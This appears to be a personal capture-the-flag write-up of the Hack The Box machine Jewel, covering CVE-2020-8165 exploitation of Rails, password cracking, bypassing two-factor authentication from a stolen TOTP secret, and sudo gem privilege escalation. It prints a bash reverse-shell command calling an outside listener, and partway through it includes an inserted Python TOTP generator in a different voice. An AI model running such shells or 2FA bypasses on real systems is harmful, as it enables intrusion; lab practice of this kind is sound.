I am in the midst of my pursuit for the Offensive Security Certified Professional (OSCP) certification in May. Part of my preparation is to take on machines available on Hack The Box (HTB) platform. HTB is a great platform for practicing and learning new penetration testing skills as well as taking on the challenge of “capturing the flag” on their machines.

Jewel will be the first medium rated box I’m attempting. Let’s get right into it.

Prerequisites

I added the machine's IP to my /etc/hosts file for easier access to the target machine:

echo "10.10.10.211 jewel.htb" >> /etc/hosts

Reconnaissance

My first step was to run an Nmap scan:

nmap -Pn -sC -sV -A -p- -oN initial 10.10.10.211 

From the results, I could infer that two web servers were running, on ports 8000 and 8080.

Port 8000:

Port 8080:

I further enumerated the web server on port 8000 and found out that the app was running on Rails 5.2.2.1.

Exploitation

Searching online, I found that this version is vulnerable to CVE-2020-8165 (untrusted Marshal deserialization in ActiveSupport's MemCacheStore and RedisCacheStore, leading to remote code execution), and I found a proof of concept (PoC) for it. To use the PoC, I needed a user account on the application, so I visited port 8080 and created an account with the following credentials:

Username: hri@test.com | Password: hri. After setting this up, I was ready to use the PoC.

I ran the command python3 exploit.py 10.10.10.211 8080 hri@test.com hri "bash -c 'bash -i >& /dev/tcp/10.10.14.69/4444 0>&1'" with a Netcat listener on port 4444 to catch the shell.

Gaining Access

This worked, and I gained a shell as the user bill.

After gaining access, I stabilised my shell by connecting via SSH and started my privilege escalation hunt.

I used LinPEAS for this, and it found a password hash belonging to bill.

Escalating Privileges

I copied the hash and cracked it using John the Ripper. The password was spongebob. Using it, I ran sudo -l to see how else I could advance. However, I was halted by a request for a verification code:

I figured that this was two-factor authentication, so I enumerated the machine further and found a hidden file, .google_authenticator, in bill's home directory.

The first line of the file is the TOTP secret: 2UQI3R52WFCLE6JTLDCSJYMJH4. I added it to an authenticator app on my phone and was able to retrieve the current code:
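Rather than transcribing the secret into a phone app, the code can be computed offline from the first line of .google_authenticator. The following is an added example and not code from the original writeup: a minimal RFC 6238 TOTP implementation in Python. The secret and file contents embedded below are the RFC 6238 test vector, constructed for illustration, not the secret from the box, and the function names are my own. Because TOTP depends on the clock, it also emits the codes for the neighbouring 30-second windows, which covers a target whose clock is a little off from the attacker's.

```python
import base64
import hashlib
import hmac
import struct
import time

# Constructed sample input: the RFC 6238 test secret ("12345678901234567890" in
# base32) laid out the way libpam-google-authenticator writes ~/.google_authenticator.
# This is the RFC's published test vector, not the secret from the box.
RFC_SECRET_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"
EXAMPLE_FILE = f"""{RFC_SECRET_B32}
" RATE_LIMIT 3 30
" TOTP_AUTH
"""


def parse_google_authenticator(contents: str):
    """Split a .google_authenticator file into (secret, options, scratch_codes).

    The first non-empty line is the base32 secret; lines starting with '"' are
    PAM module options; remaining all-digit lines are one-time scratch codes.
    """
    lines = [line.strip() for line in contents.splitlines() if line.strip()]
    secret = lines[0]
    options = [line[1:].strip() for line in lines[1:] if line.startswith('"')]
    scratch = [line for line in lines[1:] if line.isdigit()]
    return secret, options, scratch


def hotp(secret_b32: str, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then
    dynamic truncation to `digits` decimal digits."""
    # Google Authenticator stores the secret without base32 padding; restore it.
    clean = secret_b32.strip().upper()
    key = base64.b32decode(clean + "=" * (-len(clean) % 8))
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    binary = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % (10 ** digits)).zfill(digits)


def totp(secret_b32: str, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter set to floor(unix_time / step)."""
    return hotp(secret_b32, int(unix_time) // step, digits)


def totp_window(secret_b32: str, unix_time: int, skew_steps: int = 1, step: int = 30):
    """Codes for the previous, current and next time steps (one each side by
    default), so a target clock that is slightly off still gets a matching code."""
    return [totp(secret_b32, int(unix_time) + k * step, step)
            for k in range(-skew_steps, skew_steps + 1)]


if __name__ == "__main__":
    secret, options, scratch = parse_google_authenticator(EXAMPLE_FILE)
    now = int(time.time())
    print("options:", options, "scratch codes:", scratch)
    print("codes for t-30, t, t+30:", totp_window(secret, now))
```

Before trusting a code, compare the target's clock (date +%s in the SSH session) with your own; if they differ by more than a step, pass the target's time to totp rather than the local time, since the PAM module validates against the box's clock, not yours.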

With the code accepted, I was able to run sudo -l without further prompts:

From this, I inferred that bill could run gem with root privileges. GTFOBins lists exactly how to abuse that to escalate privileges:

I ran the command, elevated my privileges and obtained the root hash:

I am so glad that I managed to solve my very first medium-tier box and am looking forward to conquering my next!